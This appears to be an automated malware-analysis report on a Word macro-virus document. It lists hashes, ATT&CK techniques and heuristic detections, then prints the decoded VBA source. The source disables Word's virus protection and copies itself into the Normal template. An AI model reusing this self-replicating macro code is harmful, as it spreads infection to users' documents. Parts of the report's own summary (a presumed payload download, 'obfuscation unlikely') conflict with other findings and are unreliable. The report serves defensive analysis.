Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7cbe0664a4f40c0f…

MALICIOUS

Office (OLE)

676.0 KB Created: 1999-07-05 10:46:00 Authoring application: Microsoft Word 8.0 First seen: 2020-08-10
MD5: 1bca79b5fcad2bdb916936d15bf4070e SHA-1: 4f5bcbec151186a158448d0e7c585943cac45c62 SHA-256: 7cbe0664a4f40c0f3ca11e6e3d739523493d623ba35f27ec672b5266c8136436
400 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro attempts to execute code, likely to download and run a second-stage payload. The presence of a Shell() call and the use of `CreateObject` and `Shell` functions indicate an attempt to execute arbitrary code, which is a common technique for malware droppers.

Heuristics 8

  • Equation Editor OLE object high CVE related OLE_EQUATION_EDITOR
    Contains Equation Editor object — related to CVE-2017-11882 / CVE-2018-0802 exploitation, but CLSID presence alone is not the malformed MTEF exploit primitive.
  • ClamAV: Doc.Trojan.Nono-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Nono-2
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5243 bytes
SHA-256: a3bf087f31d47d64549aac1fc9422578344d8cb60713af916e1304192f4c39f2
Detection
ClamAV: Doc.Trojan.Nono-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "OA"
Private Declare Function GetShortPathName Lib "kernel32" Alias "GetShortPathNameA" (ByVal lpszLongPath As String, ByVal lpszShortPath As String, ByVal cchBuffer As Long) As Long
Sub AutoOpen()
On Error Resume Next
cr = vbCr
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=Chr(118) + Chr(49), Object:=wdOrganizerObjectProjectItems
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=Chr(118) + Chr(49) + Chr(49), Object:=wdOrganizerObjectProjectItems
If Minute(Now) = 30 And Second(Now) >= 16 Then Call a
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines > 0 Then
Application.Run MacroName:="Normal.ThisDocument.AutoOpen"
End
End If
Application.OrganizerRename Source:=ActiveDocument.FullName, Name:=ActiveDocument.VBProject.VBComponents.Item(2).Name, NewName:=Application.UserInitials, Object:=wdOrganizerObjectProjectItems
ActiveDocument.VBProject.VBComponents.Item(Application.UserInitials).Export "c:\" + Application.UserInitials
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoOpen()" + cr + _
"On Error Resume Next" + cr + _
"If ActiveDocument.VBProject.VBComponents.Item(2).Name = Application.UserInitials Then" + cr + _
"If Dir(""c:\"" + Application.UserInitials) <> Application.UserInitials Then" + cr + "ActiveDocument.VBProject.VBComponents.Item(x).Export ""c:\"" + Application.UserInitials" + cr + _
"End If" + cr + "Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=Application.UserInitials, Object:=wdOrganizerObjectProjectItems" + cr + _
"End If" + cr + "Out:" + cr + "End Sub" + cr + "Sub AutoClose()" + cr + "On Error Resume Next" + cr + _
"ActiveDocument.VBProject.VBComponents.Import (""c:\"" + Application.UserInitials)" + cr + "ActiveDocument.SaveAs FileName:=ActiveDocument.FullName" + cr + _
"End Sub" + cr + "Sub ToolsMacro()" + cr + "End Sub" + cr + "Sub ViewVBCode()" + cr + "End Sub" + cr + _
"Sub Autoexec()" + cr + "If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then" + cr + _
"Open ""c:\v1.bas"" For Output As 1" + cr + "Print #1, ""Attribute VB_Name = """"v1""""" + cr + _
"Print #1, ""Sub AutoOpen()""" + cr + "Print #1, ""ActiveDocument.VBProject.VBComponents.Import (""""c:\"""" + Application.UserInitials)""" + cr + _
"Print #1, ""End Sub""" + cr + "Close 1" + cr + "NormalTemplate.VBProject.VBComponents.Import (""c:\v1.bas"")" + cr + "End If" + cr + "End Sub")
NormalTemplate.Save
Call B
End Sub
Function a()
If Day(Now) = 10 Then
an = MsgBox(Chr(82) + Chr(117) + Chr(110) + Chr(32) + Chr(65) + Chr(110) + Chr(105) + Chr(109) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(63), vbQuestion + vbYesNo, Chr(72) + Chr(97) + Chr(114) + Chr(100) + Chr(46) + Chr(80) + Chr(111) + Chr(112) + Chr(112) + Chr(121))
If an = vbYes Then Call a
If an = vbNo Then GoTo nono
End If
Set cb = New DataObject
oi = Chr(32)
Application.EnableCancelKey = wdCancelDisabled
S = Chr(86) + Chr(105) + Chr(99) + Chr(111) + Chr(100) + Chr(105) + Chr(110) + Chr(69) + Chr(83) + oi + oi
Application.Caption = oi + oi + S + Chr(47) + Chr(84) + Chr(78) + Chr(78) + oi + Chr(47) + Chr(67) + Chr(66) + oi + oi
For an = 1 To 3
For x = 1 To 15
yy = S + yy
Application.StatusBar = yy
Call Delay
Next x
For t = 1 To 12
yy = S + vbTab + yy
Application.StatusBar = yy
Call Delay
Next t
For u = 1 To 10
yy = vbTab + S + vbTab + yy
Application.StatusBar = yy
Call Delay
Next u
Next an
yy = S + oi + Chr(45) + Chr(45) + Chr(45) + Chr(62) + oi + yy
For i = 1 To 115
yy = oi + yy
Application.StatusBar = yy
For o = 1 To 400000
Next o
Next i
Application.StatusBar = Chr(62) + Chr(58) + Chr(45) + Chr(41) + yy
Application.Caption = Application.Applica
... (truncated)